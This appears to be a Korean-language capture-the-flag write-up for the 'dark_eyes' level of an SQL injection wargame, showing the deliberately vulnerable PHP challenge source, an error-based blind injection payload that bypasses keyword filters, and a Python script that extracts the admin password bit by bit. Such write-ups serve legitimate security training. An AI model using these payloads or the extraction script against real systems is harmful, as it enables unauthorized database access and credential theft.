LOS Lv.22 dark_eyes
dark_eyes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
query : select id from prob_dark_eyes where id='admin' and pw=''
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(mysqli_error($db)) exit();
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
highlight_file(__FILE__);
?>
Solution
1
2
3
4
5
이 문제 또한 서브쿼리를 이용해서 풀 수 있음.
비밀번호 길이를 구할 때, 함수 결과가 참이면 1을 리턴하고 거짓이면 0을 리턴하게 됨.
만약 거짓이면 0이 리턴되면서 서브쿼리 결과가 2개가 되므로 에러 발생.
?pw=' or id='admin' and (select 1 union select (length(pw)=8)) %23
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
url='https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'}
pw=''
bit_val=''
for i in range(1,9) :
payload={'pw':"' or id='admin' and (select 1 union select (length(bin(ascii(substr(pw,"+str(i)+",1))))=7)) #"}
res=requests.get(url,headers=headers, params=payload, cookies=cookies)
if "./config.php" in res.text :
bit_len=7
else :
bit_len=6
for j in range(1,bit_len+1) :
payload={'pw':"' or id='admin' and (select 1 union select (substr(bin(ascii(substr(pw,"+str(i)+",1))),"+str(j)+",1)=0)) #"}
res=requests.get(url,headers=headers, params=payload, cookies=cookies)
if "./config.php" in res.text :
bit_val+='0'
else :
bit_val+='1'
pw+=chr(int(bit_val,2))
bit_val=''
print("pw :",pw) # 5a2f5d3c
This post is licensed under CC BY 4.0 by the author.